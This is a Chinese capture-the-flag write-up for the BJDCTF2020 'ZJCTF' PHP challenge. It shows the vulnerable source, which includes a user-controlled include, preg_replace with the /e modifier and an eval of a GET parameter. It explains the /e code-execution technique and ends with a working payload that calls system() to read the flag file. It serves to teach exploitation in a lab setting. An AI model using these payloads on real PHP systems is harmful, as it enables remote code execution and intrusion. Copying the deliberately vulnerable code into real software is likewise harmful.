[BJDCTF2020]ZJCTF,不过如此
知识点
- php://input
- filter伪协议
- preg_replace() /e模式命令执行
题目源码
<?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,‘r‘)==="I have a dream")){ echo "<br><h1>".file_get_contents($text,‘r‘)."</h1></br>"; if(preg_match("/flag/",$file)){ die("Not now!"); } include($file); //next.php } else{ highlight_file(__FILE__); } ?>
读取一下next.php
#next.php <?php $id = $_GET[‘id‘]; $_SESSION[‘id‘] = $id; function complex($re, $str) { return preg_replace( ‘/(‘ . $re . ‘)/ei‘, ‘strtolower("\\1")‘, $str ); } foreach($_GET as $re => $str) { echo complex($re, $str). "\n"; } function getFlag(){ @eval($_GET[‘cmd‘]); }
preg_replace
preg_replace(pattern, replacement, subject)
当pattern传入的正则表达式带有/e时,存在命令执行,即当匹配到符合正则表达式的字符串时,第二个参数的字符串可被当做代码来执行。
这里第二个参数固定为strtolower("\\1")
这里的\\1
实际上体现为\1
w3cschool
反向引用
对一个正则表达式模式或部分模式两边添加圆括号将导致相关匹配存储到一个临时缓冲区中,所捕获的每个子匹配都按照在正则表达式模式中从左到右出现的顺序存储。缓冲区编号从 1 开始,最多可存储 99 个捕获的子表达式。每个缓冲区都可以使用 ‘\n’ 访问
这里的\1指的是第一个匹配项
官方payload/?.*={${phpinfo()}}
即
<?php preg_replace(‘/(.*)/ei‘,‘strtolower("\\1")‘,‘{${phpinfo()}}‘);
但这里存在的问题是,GET方式传的字符串,.会被替换成_,这里采用
\S*=${phpinfo()} #\S 在php正则表达式中表示匹配所有非空字符,*表示多次匹配
最终payload
/next.php?\S*=${getFlag()}&cmd=system(‘cat /flag‘);
相关推荐
君子务本 2020-06-13
JF0 2019-10-19
XxZproject 2016-11-16
wugangsunny 2016-11-16
帅的相对论 2015-12-16
wugangsunny 2015-02-09
dabian 2012-07-06
fakerac 2012-09-11
longpersevere 2012-04-28
laolaolai 2009-09-16
lcyltpsr 2013-04-26
WangJiangNan 2019-04-16
phpyounger 2016-04-07
杨柳天下 2019-04-09
crqzcbk 2019-04-05
Passerby 2019-04-04
jingan欢迎您来访 2015-03-24
daoyongyu 2019-04-03